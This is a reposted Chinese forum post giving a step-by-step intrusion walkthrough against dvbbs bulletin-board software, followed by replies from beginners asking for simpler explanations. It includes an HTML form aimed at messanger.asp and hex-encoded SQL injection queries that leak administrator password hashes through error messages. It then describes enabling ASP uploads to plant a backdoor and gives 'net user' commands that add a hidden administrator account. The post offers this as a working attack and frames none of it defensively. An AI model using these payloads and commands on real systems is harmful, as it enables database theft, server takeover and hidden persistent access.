[转载]利用dvbbs短消息漏洞入侵服务器
文章作者:小路第一步:用注册好的用户名登陆,登陆时选择保存cookie,撰写短消息,保存
第二步:利用下边网页提交信息
<form action=http://xxxx/bbs/messanger.asp?action=删除草稿 method=post>
<input type=text name=id width=32>
<input type=submit>
</form>
username使用SQL Encoder编码,这里我们用一个管理员的名字radiofly
提交
select userpassword from [user] where username=0x72006100640069006f0066006c007900 and userpassword>7
得到
Microsoft VBScript 编译器错误 错误 '800a03f6'
缺少 'End'
/iisHelp/common/500-100.asp,行242
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
将 nvarchar 值 '78e4ea2181b00d21' 转换为数据类型为 int 的列时发生语法错误。
/bbs/messanger.asp,行619
78e4ea2181b00d21就是radiofly的前台密码
提交
select password from admin where username=0x72006100640069006f0066006c007900 and password>7
得到后台密码 acaa91f51ed197c7
用dvbbs密码猜解工具猜解密码 等待 等待 再等待。。。。。。ok
得到密码后登陆进入后台,修改文件上传类型,添加asp类型,上传asp后门
得到sql数据库的sa密码,使用sqlexec连接
net user admin$ xiaoxue /add
net localgroup administrators admin$ /add
到此 over :) 我知道后台管理员的名字和密码,可就登陆不上去,说~不是管理员~什么的。前台的密码我到现在还没有跑出来,老大,教教我吧 SQL Encoder编码,怎么个编写啊~
还有sql的查询,总不能在本地执行吧
各位大哥大姐,不能写的通俗点吗~毕竟这里也有新手呀
页:
[1]